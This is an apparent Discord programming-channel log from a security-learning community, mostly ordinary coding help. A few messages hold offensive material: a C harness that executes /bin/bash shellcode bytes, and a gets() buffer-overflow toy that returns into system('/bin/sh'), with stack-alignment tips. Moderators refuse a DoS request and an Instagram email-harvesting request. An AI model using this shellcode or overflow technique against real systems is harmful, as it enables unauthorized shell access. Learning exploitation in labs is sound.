#programming

its bc I didnt want to paste a long code in the chat

Its fine I'll just put more effort into it and hopefully find a solution soon

Java is gross

Guys do you know any good formatting vs code extension for c/c++?

Except for the default one from Microsoft because i have OSS code

Is there a simple crypto-random JavaScript function that given a MIN and MAX, it picks a number between them? It being a cryptographically secure random function is important btw

I have some code but it's 40+ lines, there has to be an easier way

What about implementing Crypto.getRandomValues() within a function where you pass MIN and MAX?

That's a great idea! Let's hope JS has something clean like List Comprehensions from python or Haskell's [1..3] syntax 😅

https://levelup.gitconnected.com/new-way-of-getting-random-number-in-javascript-using-crypto-9388cfbd2a3e So you can map it to [0,1] and then map that with multiplication and rounding

I am new to coding do you guys know any good video or tutorial?

hello, I would like to create a boot program in python can you help me svp?? I'm french

@graceful sparrow Now why would you want to do that?

beacause I'm curious

And I think the network is verry interesting.

And i would like to learn hacking

What exactly do you mean by "boot program"?

who send a lot of "requet" and the conexion downs

I think is this

but sorry for my english levels

You're aware that is illegal?

no

but it's no for be malicious

oh muir, might want to look at general)

What other reason is there to boot people offline?

Got him, ta

There is no particular reason but I would like to learn hacking because I would like to work in computer security and I would like to start by creating a simple program

Let's stick to ethical usage then please

yes i would like to do this but i now it's verry bizzar because i speak who i like to down connexion before but it's really

are you undurstand me?

Yeaaaah, not something we're willing to condone, I'm afraid

hi Muiri I'm sorry for spam, Charlie can send you a friends request beacause he like to talk with you

Charlie can email bans@tryhackme.com 🙂

https://wheelofnames.com/ who can make me a wheel like this one but here i can select the winner let me know please i will pay !!!

What's wrong with that one?

that one is random i need one where is i want to land on #! it will always land on #1

Sooooo, you want to cheat?

yes technically

Then I don't think we can help you I'm afraid 🙂

thats alright

does anyone here know python?

Many of us do. Do you have another question?

I can't understand, why when I assign df = pd.read_excel() in my code, it doesn't work?
but when I just try pd.read_excel(), it generates the expected data

define "it doesn't work"

How are you using this? And which library are you pulling pd.read_excel() from? Can you post the code snippet?

it doesn't generate any results, or any error message

in this, he runs

import pandas as pd
pd.read_excel ("/speciesLink_all_64743_20210330184710.xlsx")

in this he doesn't run

import pandas as pd
df = pd.read_excel("/speciesLink_all_64743_20210330184710.xlsx")

ok? so far that is expected. How are you verifying that the data is getting loaded at all?

what does the read_excel() method do? Does it just "do something" or does it also return something?

it should return a dataframe

are you running this as a script or through the CLI interpreter?

I'm using google colab, it shows that the cell has been executed, but doesn't generate any results. Should I try to run this on jupyter?

Ok. So you are running a .py file that contains this

The behavior you are describing is what i'd expect; the pd.read_excel() is passing the returned DF to the stdio. for the df = pd.read_excel() call, try printing df

ok

print(df)
^
IndentationError: unexpected indent

at least now I have an error hehe

PEP8 is your enemy now

another reason to hate python: white space as a control structure

crying in python language

it's a fair way to cry

thank you juun ❤️

honestly, get a good python editor and it's not an issue

pycharm or vim (with appropriate whitespace/tab rules)

okay

now run🤡

thank you guys, really

vscode is fine as well

gedit

vim

echo "" >

I've used vscodium, but i don't trust vscode by itself to not gather all kinds of data. MS gotta MS.

same difference

as long as we're bringing up obscure ways to create files, i'm a big fan of cat << EOF > filename

same difference with branding removed.... and one can run the sourcecode of vscodium through twistlock or sonarqube

Tbh pycharm is way to heavy

for a new python dev, it does a lot of great stuff that they don't need to care about (yet). Like venv management

U don't need it tbh if ur new

Plus, writing code without IDE make u understand and practice syntax more

Like in pycharm, it's just a character then tab tab lol.
Imo, it's not good for learning

It's great for productivity

As a newbie I would go for sublime

Very very lightweight, you can get great extensions and themes.....and it forces you to run / complie / deubg the code from a terminal / shell which I think all programmers should be used to

can i show u my new project

if ur free

it wont take much time

Of course!

Me too

Unless u wanna vim

To jump on the "best tool" discussion- on a windows machine, I've used eclipse forever for writing code, in a variety of languages. On linux, I'm now in a position where I need a full-featured debugger. Should I just go for eclipse there, or is there something a bit lighter weight that people prefer? Subl works fine for editing files, but when I need to trace code and see memory, I need more.

for a particular language?

Step through debugging is usually a specific tool per language - GDB can work for several different languages, but it is not particularly friendly to use

I like Jetbrains stuff for Java

If I'm using an IDE, most of the time it'll be a Jetbrainz product. CLion is hands down the best compromise of features I've found in a C++ IDE.

I think the only thing I'm looking at Eclipse for right now is Ghidra plugin development

intellij is okay, but I've always preferred eclipse. Just wondering if there were other good ones for linux that I haven't heard of

IntelliJ is what eclipse could be if it had a full commercial team supporting the product. Biggest problem with opensource projects is usually the lack of resources dedicated to the product

i agree on the lack of resources, but I think eclipse has both enough of a community to support it, plus some corporate teams behind it (IBM used to pay people to work on eclipse, for example). Maybe it's just because I've used it more, but intellij always kinda annoyed me. It had some nice features, but not enough to make me want to fully switch from eclipse 🤷‍♂️

@stone kayak beee what do you think of this
https://www.codingame.com/multiplayer/clashofcode

looks pretty cool

for debugging:
https://pypi.org/project/ipdb/
https://github.com/gruns/icecream

I came to know about it cuz of @hardy iris .
I tried to poke around it, didn't find private clash lol

I am unable to install tkinter in python 3.8.6 in window 7 .
Please help me

isnt that basically binary search hehe

Have you got any basic project ideas (I am learning rust)

A "fun" challenge in any language is make a program that prints out the output of the source code

https://en.wikipedia.org/wiki/Quine_(computing)

Interesting idea, will check it out later

somebody also posted an image with a ton of ideas. Lemme find it

#programming message

thanks, looks very interesting

which is the best python IDE for penetration testing

?

IDE doesn't exactly matter for pentesting?

The best IDE is the one you like most

someone informed me that matter

They lied to you.

well i like pycharm

so i am gonna stick with that

Good. What matters is the code you write, not the IDE.

thank you for your answer

I’m not sure if this will work, but it should be attached to a python script.

There’s a commented area, closer to the top, listed “the problem is from here”, “and here”; or something like that.

Thanks In advance!

https://discord.com/channels/@me/823610905702825994/826177795418751016

Is this link supposed to be like that?

It is meant to be a discord link. Yeah. It’s a long story.

We can't see that if we're not in that server.

It's @me so a link to a dm.

!docs verify

Hello I am trying to use struct.pack to convert address to lit endian but I keep having the wrong result and I can't understand.

My code:

import struct

esp = "625011AF"
esp_long = int(esp, 16)
print(struct.pack("<L", esp_long))

the result: b'\xaf\x11Pb'

Also I am running python 3.9.0

#start-here

Isn't that correct? af is the least significant byte, and in little-endian, the least significant byte is stored first

@solar hull yes but it should return b'\xaf\x11\x50\x62'

True```

>>> s
b'\xaf\x11Pb'```

ok ok make sense. but how could i prevent this conversion ?

@solar hull thanks for your help I will try to use it like that and see if that wokrs. At least now I understand where those Pb came from.

It's not actually converting anything - it's just the way bytes are printed. Bytes matching printable characters (or at least ASCII?) are shown as is, others as escaped in \xVV format.

Ok I understand. Thanks a lot

can someone help me with a basic assembly question?

Just ask ur question, someone might help

Yes ?

    case News.create_link(args) do
      {:ok, link} ->
        {:ok, link}

      _error ->
        {:error, "could not create link"}
    end
  end``` example api to create a link with graphql

    @desc "Create new link"
    field :create_link, :link do
      arg(:url, non_null(:string))
      arg(:description, non_null(:string))

      resolve(&NewsResolver.create_link/3)
    end
  end``` here is the mutation in use

you can see the little /

ah, it's a reference to a function called create_link with three parameters?

yea

I see.

you can see me defining it

well the one on top

Would you need to define that for all function references? (or what they're called in elixir/erlang 🙂 )

its exported as a module

defmodule CommunityWeb.Schema do

Yeah, but if you have a single function called create_link there, do you still need to use that arity definer? I can see the benefit if you'd have multiple functions with the same name

oh you mean back there?

thats a predefined functions that comes with the absinthe package

it helps a lot, gives you CRUD operations in graphql by just defining the object

On line resolve(&NewsResolver.create_link/3) do you need to use /3 if there's just one create_link available?

umm create link takes 3 arguments

hence the /3

Yes. Do you need to use that in all references?

no

but since I used the short version of using a function using the &

I had to

that mainly means to take all arguments since I only specified the amount

so the moment the resolve kicks in it takes all arguments passed

and graphql makes sure the types are correct

I'm not seeing a huge difference to how other languages handle function references and parameters, but maybe I'm just missing something.

    %Link{}
    |> Link.changeset(attrs)
    |> Repo.insert()
  end``` this is the predifined funct

|> its a pipe

the code is super short compared to using ts or any other lang

export class PostResolver {
  @FieldResolver(() => String)
  textSnippet(@Root() post: Post) {
    return post.text.slice(0, 50);
  }``` example with ts

and thats just the resolver

  @Field()
  @PrimaryGeneratedColumn()
  id!: number;

  @Field()
  @Column()
  title!: string;

  @Field()
  @Column()
  text!: string;

  @Field()
  @Column({ type: "int", default: 0 })
  points!: number;``` example entity

you even have to do double typing

and installing 300 packages

that's js/ts for you.

lmao

have you done graphql?

some, yes. In go and js/ts.

how is it in go?

uh, I'll have to dig a bit, I can't really remember the details 😄

it's been a couple of years.

all good

solved it, thanks

https://github.com/graph-gophers/graphql-go/blob/master/example/starwars/starwars.go has examples like ```type Resolver struct{}

func (r *Resolver) Hero(args struct{ Episode string }) *characterResolver {
if args.Episode == "EMPIRE" {
return &characterResolver{&humanResolver{humanData["1000"]}}
}
return &characterResolver{&droidResolver{droidData["2001"]}}
}for a single resolver implementation, mutations go brr:func (r *Resolver) CreateReview(args *struct {
Episode string
Review *reviewInput
}) *reviewResolver {
review := &review{
stars: args.Review.Stars,
commentary: args.Review.Commentary,
}
reviews[args.Episode] = append(reviews[args.Episode], review)
return &reviewResolver{review}
}```

dang thats some piece of code

I value readability over brevity, but YMMV 🙂

lmao

in my case the less code I write, less place to mess up

I've a couple of goworkers that are fully into elixir, they even made a CTF task for elixir RE at some point.

Im only in hs and got no dev friends, well not even friends

goworkers? more like coworkers

Hello, hello! Is anyone able to send me the alias to the openvpn for tryhackme that Muiri sent last time? Thank you in advance

#programming message this one?

What is that ^

A link to Muiri's openvpn alias.

If you don't trust the link, just search for it yourself. The message shouldn't be hard to find.

I mean, it's a Discord link

You should trust it lmao

https://www.linkedin.com/posts/stack-overflow_greatartistscopy-thekey-activity-6783378524469370880-Ojp1

Can I ask, how did you find this in the thread so quickly @solar hull

Wow!! Thank u ninja 😃

Why isn't my alias script working properly ? says command not found

@lilac holly Are you using bash or zsh?

i'm using bash

Okay, ill come back to this later. Now time for some hacking 😈

maybe because of the " " mismatch

Let me sees

I think ' " " ' works correctly.. (not sure)

Okay let me try

Didn't work

try the other way around

if that doesnt works, i have no clue, lmao.

still doesn't work

@lilac holly u need to edit zshrc

Not bashrc

As ur using zsh

so, just edit zshrc and have fun

wait

lmao

still not working

Can u show it

thmvpn=' ... '

Try single quote at beginning and end

Okay and i also forgot a forward slash in front of Donwload

also, i dont know how tmux works but I think it should be ~/Downloads/ovpnfile

Yup

Shell script care a lot about " and '

Lol

Like C

Java and Suffering FTW

Are you reloading the rc file after the edits? Not clear from the screenshot

yes

Yeah, u need to reload them too

either restarting the shell or running source ~/.zshrc

woah!

now that i ran it i get this

Wait a minute

U have tmux right

It worked!!

I had the "" incorrect

Lol

Thank you guys

https://github.com/KayakerS6/PassPY/blob/main/pass.py (v.1.02) for some reason, even when putting in the right password, it still pulls the (exit(exit)) string

Can u give more details plz @iron haven

And , the ) link is broken lol

works fine for me (both link and code, it didn't fail on login)

Maybe cuz of android haha

note that you're creating the file in 'a' mode

Weird for me lol

@solar hull confirm = lst[len(lst)-1] how do i make this line read from line 2?

readlines() should return an array of strings, with first line being at index zero etc.

maybe search for a method that let's you define the startindex (for reference in C# that would be something.IndexOf(...)

readlines() should already return the data as lines. If that's used, I wouldn't bother with doing additional string searches.

            confirm = lst[len(lst)-2]
            print("Hello " + user_name)
            password = input("Enter Password: ")
            compare = codecs.encode(password, 'ROT13')```

thats the whole context @solar hull

line 1 is at 0
line 2 is at index 1 ..... And so on

So ,if u want 2nd line, just use lst[1]

@remote echo that didnt work.

Then consider running in a debugger and checking what values you have in the array/list. That should give you a hint of what's wrong.

TBH I feel like you should be using a config file or something here that's easily parsed

Guys one simpleqn which I can't able to understand What is the difference between
input() vs input ().strip()
why do we needed ?

Is that only removes spaces ?

strip() removes \n from end of line

U can use it to strip anything

Like strip("bad") will strip "bad"

Fine tq

Hello everyone,
So the problem I'm trying to solve is checking if two integer numbers are digit like.
That means they are made of the same digits. For example 123 and 1321 are digit like but 505 and 55 are not.
I've written my implementation of are_digit_like function in C with a few helper functions.
It works okay, but I'm wondering if there's a better solution for that. Does anyone have any thoughts?
My code:

#include <stdio.h>
#include <stdlib.h>
#include <math.h>
#include <string.h>

// check if num is in array
// Params: 
//          - number
//          - array
//          - length of array
_Bool is_in_arr(int num, int *arr, int len){
    for (int i=0; i<len; i++)
        if (num == arr[i]) return 1;
    return 0;
}

// returns the digit length of int
// Params: integer number
int int_len(int num){
    return floor(log10(num))+1;
}

// converts integer into array of its digits
void int_to_arr(int num, int *arr){
    int i = 0;
    while (num >= 1){
        arr[i++] = num % 10;
        num /= 10;
    } 
}

// checks if two numbers are digit like
// Params: 
//          - number one
//          - number two
_Bool are_digit_like(int a, int b){
    // initialize arrays of integer lengths
    int arrA[int_len(a)];
    int arrB[int_len(b)];

    // convert integers into arrays
    int_to_arr(a, arrA);
    int_to_arr(b, arrB);

    _Bool digit_like = 1;

    // check if every digit or num a is in num b
    for (int i=0; i<sizeof(arrA)/sizeof(int); i++){
        if (!is_in_arr(arrA[i], arrB, int_len(b)))
            digit_like = 0;
    }

    // and vice versa
    for (int i=0; i<sizeof(arrB)/sizeof(int); i++){
        if (!is_in_arr(arrB[i], arrA, int_len(a)))
            digit_like = 0;
    }
    return digit_like;
}

I'd probably skip length calculations, and init the arrays as [10] as there's not going to be digits outside that range.

So basically what I'd do is...

1. go through the numbers and set the corresponding array's index at digit to 1

2. compare these arrays

Yeah, that should make the code a few lines shorter and more concise

thanks for the suggestion

Traceback (most recent call last):
File "46635", line 11, in <module>
import requests
ImportError: No module named requests

can anyone help me with this error?

i get when i try to run an exploit on cms made simple

i guess it is an error on my python but i dunno how to solve it

Have you tried googling the error?

yes

i tried some things but anything help'me

I have googled

Traceback (most recent call last): File "46635", line 11, in <module> import requests ImportError: No module named requests

And

ImportError: No module named requests

Both of which gave me an answer:) The second one is a little easier to find answers for.

on google i only found some things tell me to run pip install requests

but din't work

pip3 install if python3 or pip2 if python2

you should Google this too 😁

python3 -m pip or python2 -m pip is probably better to make sure you have the right one

google

everything

moving my code here lol

IDC how bad it is but it works

gods inline assembly is terrible 😦

Lol

can anyone help me understand what's going on with a buffer overflow in this toy example I wrote? If I get to system("/bin/sh"); by just calling testTarget normally, it does what i'd expect. but if i use a buffer overflow to get there, system() just instantly returns 139 and i don't get a shell at all. fwiw i've been compiling this with gcc -no-pie -w -g -O0 -fno-stack-protector ./test.c ```c
#include <stdio.h>
#include <stdlib.h>

volatile void testTarget() {
int system_result = system("/bin/sh");
printf("system result: %i\n", system_result);
}

int main() {
volatile char test;
if (0) {
testTarget(); // does what i'd expect. i get dropped into a shell, and after i exit from the shell system() returns 0
} else {
gets(&test); // when i buffer overflow & return into testTarget, i don't get a shell, and system() immediately returns 139
}
return 0;
}

googling around, it seems like 139 might mean there was a segfault in the forked process (/bin/sh), but i don't see how the way that i get to testTarget could possibly cause a segfault in the child process

Are you on ubuntu?

yep, 18.04

It's stack alignment

Change your system("/bin/sh"); to execve("/bin/sh", NULL, NULL); and it should work

ah, yep that fixes it! and googling around for ubuntu stack alignment there are lots of blog posts to read further about it. thanks!

Np 👍

Or use returned oriented programing to align the stack by executing one ret instruction before returning to testTarget

I believe LiveOverFlow made a video about this

how does this fix it btw ?

I want to create a tool in python3 that has to be able to handle switches/flags (like "-sC" or "-A" in nmap) , do I have to read from stdin or how should this be done?

Lookup getopt or parseargs

thanks!

pip install requests
pip3 install requests
pip2 install requests i dunno if pip2 exists but anyway

HI

hello 👋

hey :3

mellow

Hiiii

c = 0x8ba4c4dfce33fd6101cf5c56997531c024a10f1dc323eb7fe3841ac389747fb90e3418f90011ef2610fa3636cd6cf0002d19faa30d39161fbd45cc58abff6a84
b = 0xf969375145322aba697ce9b4e00aa88e81ffe5c306b1b98148f33c4581b2ac39bc95f13b27c39f2311a590b7e27cdbdb7599f615acd70c45378e44fb319b8cb6
a3 = c^b
d = 0x855249b385f7b1d9923f71feb3bdee1032963ab51aa7b9d89a20c08c381e77890aa8849702d8791f8e636e833928ba6ea44c5f261983b7e29bd82e44b77fe03b
a1 = a3^d
e = 0xf694bc3d12a0673aead8fc4fdf964f5ec0c1d938e722bf333000f300088ead0dec1e7e03720331098068c13a066ca9bca89850a8ee67feb8471af5f47b4c0f13
print(hex(a1))
for i in range(0,256):
    flag = hex(e^a1^i)
    flag = bytearray.fromhex(flag[2:]).decode('UTF-8')
    print(flag)

for some reason i keep getting error

ValueError: non-hexadecimal number found in fromhex() arg at position 127

Is this for an active CTF?

no

https://github.com/b01lers/bootcamp-2020/blob/master/crypto/SharedDreaming/dist/output.txt

its from 2020

Think of what hex produces, and what fromhex expects.

Hint: ```>>> bytearray.fromhex('0')
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
ValueError: non-hexadecimal number found in fromhex() arg at position 1

bytearray.fromhex('00')
bytearray(b'\x00')```

ohhhh

i got it

thanks @solar hull

Hey, how can i get the (recovery-)email of a instagram account using python?

-ban @lilac holly trying to attack instagram to get email addresses.

🔨 Banned affiliate#6900 indefinitely

when making custom metasploit modules how do you figure out all the valid defaultoptions you can use? Or there any good way to add custom ones as a option/variable name?

https://www.offensive-security.com/metasploit-unleashed/building-module/ It's covered in this course?

doesn't seem like it unless I'm blind. Shows how to add module to /home/username/.msf4/modules directory if the searchsploit module is not already in metasploit or something like that.

my custom options don't show up when the module is selected. Wondering if you can add custom option variables or something like that

¯_(ツ)_/¯

dark would probably know didn't he make the metasploit room?

That was about using metasploit

rather than developing for it

oh is that what you guys want me to make next? how to make custom metasploit modules...

I have said this before and I will say it again, I do not represent THM

just joking come on man

anyways

Hey Nuclearpro

?

do you have a question?

Have you tried issuing a ticket on the metasploit github?

I have not been googling around and wondered if someone had a better resource to read up on that
Was googling around a little but this fix is tooooooo late oh well im dumb dumb

I'd hate to bring up the rules because I have been in your shoes but could you respect rule 13 🙂

@true pumice question is wrong to ask questions here like running enumeration in the background while you continue to google for whatever you are looking for? In case your enumeration and or question doesn't discover what you may need to have that eureka moment.

There's a chance that the community members/ staff are going to look on google anyway, it makes our lives easier. Especially if you ask for some help, then a community member googles it for you and finds the exact same resource.

@true pumice I won't know until I ask, but I will keep googling alone.

All I ask, very kindly, is just to respect the rules 🙂 They're there for a reason :)

I need some help with a homework problem in C, if anyone has a moment and some experience. I've been trying to understand what i'm doing wrong for a while. The program involves the use of pointer and is modular in nature, some of my variables move and return the data as required but some seem to be returning memory addresses, despite that as far as i can see, i treat both variables the same throughout the program. I'd post code, but it's at about 100 lines (exceeds 2k characters) at the moment and i don't know if that's ok. (if this is in violation of rules in any way please let me know and i'll either modify or delete my post)

So my C is rusty as all heck, but a pointer is essentially just an address of another location in memory. When you dereference that, you're getting the value stored at the location that pointer points to. HOWEVER, the value stored there might be a pointer to somewhere else

so you might need to dereference it again

this is typical in things like multi-dimensional arrays

The data we're working with in this program is simple, type int, float and char.
Checking my de-referencing again won't hurt though, at least gives me somewhere to start, thank you!

you're welcome. Hope that helps. And like I said, I'm super rusty in C, so it might be something totally different

That's perfectly fine, I appreciate the input regardless 🙂

Haven't had any luck so far, but i'll keep researching and see if we can't sort this out.

Post it on pastbin

And share the link

Or github

Pastebin for the above https://pastebin.com/QCdcG7Ui

Do you know where the problem is

name should be an array

You're passing a char variable to a function that accepts char *, aka you're overwriting data on the stack

Use an array, pass its size as an argument and use fgets to get the input with that size

Nevermind I'm blind

Lmao

My bad

Ok, so point of note here, the values which do pass correctly through to the main and display are the service costs, total cost, name (which is actually a char not due to my decision but as a requirement), license and dayCount3 the others don't and show memory addresses (at least thats what i think they are)

If it helps at all, this is the output, note the first 2 day counters and the avg days

Hire information is typical, it's only inside of the averages and day counters where we go a bit screwy, though total service costs are correct.

So the statistics are wrong ?

Or just the days hired less than 4

so the output for "Statistics of hire activities" row 1 and 2 are incorrect and seem to be pointing to memory address
row 3 is correct
row 4 is incorrect and seems to be memory address / 7
total rent is correct (row 5).

It could be overflowing rather than pointing at an address

Btw are you on a hurry ? Cause I can probably check this tomorrow morning

Not in a hurry but just resolved my issues

appreciate the help heaps though

What was the problem ?

Basically when i was creating variables to link to the pointers in the main i need to specify int daycount1 = 0 for example, otherwise the pointer just filled the value of the thing it pointed to with garbage

which went against what i though which was that it would simply initialize with a default value of 0,

the only reason daycount3 worked is because it was just a conincidence that it got that assignment

A classic

No doubt, thank you very much for your input though! it's really appreciated 🙂

Does anyone know how to save a tmux session in a file that can be accessed in the future?

Specifically to a file? Or just disconnect so you can reconnect later and it'll keep stuff running?

File, process running in the backgorund whatever

I just need it to be there so that a CTF user can access it

Are you making a THM room? If it doesn't specifically need to be tmux then you should make a system service.

So that it starts on boot

There is a plugin you can use to save tmux sessions

@wary sky https://github.com/tmux-plugins/tmux-resurrect

@true pumice update doesn't seem like the metaploit thing works since the target can't edited without editing the file it's self or using the edit command

anyone knows how to program using python i need a lil help

Just ask your question

i cant upload the pictures in here

@glad void Verify with the bot 🙂

!docs verify

does anyone know how (or if it is possible) to make a python file to an executable without pyinstaller?

There are a bunch of python "compilers" -- pyinstaller isn't the only one

That said they aren't real compiled files -- basically just taking the Python runtime environment and packing it up with the script

i.e. the executables are huge and slow

The real question is - why?
All those techniques tend to be picked up by AV even if your script is not malicious.

I've also had issues with getting that compiled code to work well across platforms

aight, thanks man

honestly i would use Click? 😄

https://github.com/pallets/click/

No need to ask to ask, just ask 😄

i am a python beginner but i can try

maybe instead of trying to print it immediatelly into the console, create a buffer of sorts that you can manipulate things easier before showing them to the user :)

not really, i'm saying buffer as a general term for something that you can place the data in for manipulation before actually outputting it

it can be a string, an array or whatever

also just so i know, is printing the stickfigure on the highest peak also part of the task? 😄

can you copy/paste the sample input string for me?

yeah i'm bored since i'm waiting for a process to finish so might try to do it myself lol

noice, thanks :)

If you’d be using websockets for generic events, would you use some framework for that, or just send type-value pairs over the socket?

Another idea (not the most efficient, but should work) is to iterate through the numbers, keeping track of what the current height is, as well as the max height (and which index the max height occurred at). That's an O(n) operation. Then when you start drawing it, you start at that index and work your way out in both directions. Corollary to that idea is to keep track of each peak, and what their height and index are. This would require a separate array, probably m/2 in size (where m is the number of digits in the input). Then as you draw, you start with the highest peak, then scan through the array looking for peaks of H-1, then repeat. Again, not the most efficient way of doing it, but maybe that will give you some ideas.

The fun part is now working with different data structures and/or algorithms to do it more efficiently 🙂

and to make it cover all input cases

Am i the only person find python is way more confusing and harder to read than c and ,c++?

how come?

@hollow bison I can solve that for you:
https://github.com/ciphey/cipheycore

Good luck.

go read some javascript and come back

No braces

🙏

eh i mean thats why indentation exists

White space as a control structure is bad design, imo. Goto Fail is just one example of why.

...except that gotofail wasn't caused by white space as control structure. C style languages do not have that, but they're allowed to have code blocks both with and without braces.

@lilac holly Almost exactly like you're suggesting

arr = [[1,2],[3,2]]

That's a 2D array

@lilac holly https://docs.python.org/3/tutorial/datastructures.html

If you wanted to append something to the first dimension you would do arr.append([1,2]), same as normal

If you were appending to the second dimension you would do something like arr[0].append(4)

That would add a tuple,but yes

Someone that knows what this can be and how to decode this:

load("\121\103\90\119\112\86\48\107\69\52\73\102\100\100\81\114\118\109\70\104\84\98\112\111\65\65\119\74\55\50\98\106 etc etc etc (1 hella big file)

looks like charcode, pick a language and theres probably a function to decode

It was bytecode, now its like this: https://ghostbin.com/paste/yACRG

Hey everyone,

Not sure if this will be useful for anyone, but I posted a simple MD5 hash cracker python CLI app on github that has been pretty useful for me doing some of the rooms that require a MD5 hash cracking.

Anyways clone if you want, and hope it can be helpful to some people! 😄

https://github.com/Kody-Bentley/md5cracker

doesn't hashcat do the job though?

I want to compare two strings and the following works :

if [[ $line = *[0-9]"/"*]];then
  echo "found!"
fi

My intention is to find a pattern that has a digit and then a slash "/"
So far so good, but when I try this with "\d" instead of "[0-9]", it doesn't work anymore, any idea why?
This is the code that doesn't do what I expected :

if [[ $line = *\d"/"*]];then
  echo "found!"
fi

It's in bash btw

Does \d work in bash regex syntax? Could you try using something like [:digit:] instead? (Or [[:digit:]])

It works with [[:digit:]] but what I don't get is why doesn't it work with \d Isn't it supposed to be the regex for a digit?

Is it in bash?

Also, the single backslash might be considered escaping. You could try using double backslash instead.

oh bloody heck that's probably it

nope

and [[:digit:]] seems longer-winded than [0-9]

That is completely dependent on the regex engine you are using; \d is usually a shortcut for [0-9] but not always. Differences between engines aren't limited to just the right escape characters.

IIRC the default regex used by bash is not POSIX compliant - take that with a grain of salt though

Are you saying there's multiple regex engines in bash?

there are several in grep in any case

My teacher told me \d doesnt work in bash posix regular expressions, thats it

thanks to all of you!

Hey everyone!

Just wanted to post and share a python cli app I have been developing for OSINT, still a work in progress, check it out if you want and hope it can prove beneficial. Any questions or issue please feel free to DM me.

https://github.com/Kody-Bentley/who-they-bee

Don't hold me too closely to it, there is an option for 'extended regex' which I think is closer to (if not actual) compliance to the POSIX regex standard. I think the normal behavior is glob matching, not regex as well. If you have additional docs on it, Please share.

No, I don't have any better knowledge, I was just interested in that 🙂

An additional binary operator, =~, is available, with the same precedence as == and !=. When it is used, the string to the right of the operator is considered a POSIX extended regular expression and matched accordingly (as in regex(3)).

So, I decided to look into man page. That's as you said @magic falcon

That makes sense; I know I've had problems with regex matching in bash expressions. Using that operator makes more sense! The same applies to grep, as well. Check out the extended regex matching options there as well

I'm familiar with grep -e (and egrep), but didn't think that'd be available for bash. I haven't really done that much bash scripting.

I'm in the process of moving all of my bash scripts to ansible files - for the work I do, it makes more sense to store things that way. both for replication and testing of configs

question about python1 exploits, when running an exploit that requires a certain module, it won't recognise the python3 module alraedy installed. Is there any way to fix this?

They're not compatible

Why when i type anything he asks for the IP?

hostDec = input('The server is created by default using localhost, do you want to change it? (Y/n)\n')

if hostDec == 'Y' or 'y':
    host = input('Type the IP: ')
else:
    host = 'localhost'

It's because that or

It's taking it as if (hostDec == Y) or 'y'

So or 'y' evaluate to true

Leading the execution of if statement

hmm understand

use
if hostDec.lower() == 'y':

this read the uppercase too?

Or use
if hostDec == 'Y' or hostDec=='y':

oh gotcha

.lower() function convert everything to lowercase

So it will convert Y to y

nice

thanks

I guess something like if hostDec in (’y’, ’Y’): would work as well, but in this case it wouldn’t make much sense 🙂

good to know, thanks

Many ways to achieve same things. XD

yep

im trying to create a chat

Nice

hi , can somebody help me with this question :

You will draw one buffer diagram. Assume Buffer size is 3 and the counter is 0. For the producer process, you will fill the buffer and for the consumer process, you will consume the item from the buffer. You have to dry run below code.
while (true) {

/* produce an item in next produced */

while
(counter == BUFFER_SIZE) ;

/*
do nothing */

buffer[in]
= next_produced;

in
= (in + 1) % BUFFER_SIZE;

counter++;

}

while (true) { while
(counter == 0) ;
/* do nothing / next_consumed = buffer[out]; out
= (out + 1) % BUFFER_SIZE; counter--; /
consume the item in next consumed */
}

Please use code blocks

You have to dry run below code. - Do you understand this line? You need to trace through the code yourself

sorry to interrupt can anyone help me understand why does gdb throws this error

single line stepping until exit from function code

even tried si

but then it just shows SIGSEV

1       #include<stdio.h>
2       #include<string.h>
3
4       unsigned char code[] = \
5       "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05";
6
7       main(){
8               printf("Length: %d\n", strlen(code));
9               int (*ret)() = (int(*)())code;
10              ret(); 
11      }

yes i understand that, what i donot understand is , the producer process and consumer process . I am beginner and donot know much about buffers.

I would recommend asking your teacher first and foremost

thats a /bin/bash shellcode tho

from here : http://shell-storm.org/shellcode/files/shellcode-806.php

a producer produces whatever is being put in the buffer, and a consumer will consume things from the buffer

the process itself is irrelevant to the task

okay , and how would i draw a diagram for that

I'd check your course notes for that

this is a classic problem .. i remember we had to do problems like this.. and extensions of it.

the main point is not the actual producing and consuming..
it's about the sync.. what happens when the buffer is full.. what happens when the buffer is empty etc etc..
now if we add multithreaded concept to this how would it affect the solution overall.. i.e manual locking or multiple buffers etc etc..

Hey guys, In an array-based implementation of a stack, is the top of the stack located at index 0?

it can be, but it depends on how you implement it. 🙂

For example:

stack = [9, 6, 1]
stack.pop()
# 1
stack.append(16)
[9, 6, 16]

Or:

stack = [9, 6, 1]
stack.pop(0)
# 9
stack.insert(0, 16)
[16, 6, 1]

Any idea bout this??

Ty @stone kayak

That code worked on ubuntu but not on kali

I guess you could do that? Usually the current index of a stack is the offset from base. Because it's easier to add/remove than to shift everything.

In this case, easier = more efficient

Bee's sample code really isn't indicative of the actual underlying mechanics of array-implementation of a stack. Your code will be simpler and easier to debug if you don't do it that way. IMO, code should always be written with the idea in mind that someday someone else is going to have to maintain your legacy code - if you want to field email questions about a weird design choice from 15 years ago, do it as crazy and obfuscated as you want.

This is true! Follow this advice @lilac holly 😄 I just like finding out that things you're used to (I.E. stacks working "at the back" in Python) can actually be done the opposite, working "at the front" 🙂

The concept's the same in java too right? @magic falcon

How I described it, yes. In Java, there are standard classes for stack and queue based structures. If this is for coursework and you aren't allowed to use those libraries, then using a statically sized array or ArrayList should be implemented in as intuitive a way as possible, eg start from 0 index and grow up

When I was a teaching assistant and grading assignments, I took points off for bad style. Which includes obfuscated/non-intuitive implementation.

I see, Thanks for the help @magic falcon @stone kayak

hey guys, i have to analyze a file that is obfuscated with this shit Chr(44)&Chr(45)&"3"&Chr(44)&Chr(45)&"1"&Chr(44)&Chr(45), ive done it before but forgot how, can u point me in right direction of deobfuscating that?

Think about what those numbers could represent

anyone here used mitmproxy or scapy to intercept traffic?

Hey, anyone good with Python?

What's your problem?

Im trying to iterate over a text file and find all instances of text that starts with ">" and set a counter so each time it does encounter a > it raies the counter by one.

Well

When reading from a text file, it stores each line in a list

@lilac holly Might not be relevant, but Humble have a few kindof.. heavy,, python books in a budle right now https://www.humblebundle.com/books/ultimate-python-bookshelf-packt-books

So probably something like

read = file.readlines()

counter = 0

for line in read:
  if line.startswith(">"):
    counter += 1
  
  else:
      pass

print(counter)

tbh you don't exactly have to be good with Python to do that 🙂

That looks about right, just print the counter at the end.

Oh yeah ^

Will try this Jabba👍 Much appreciated

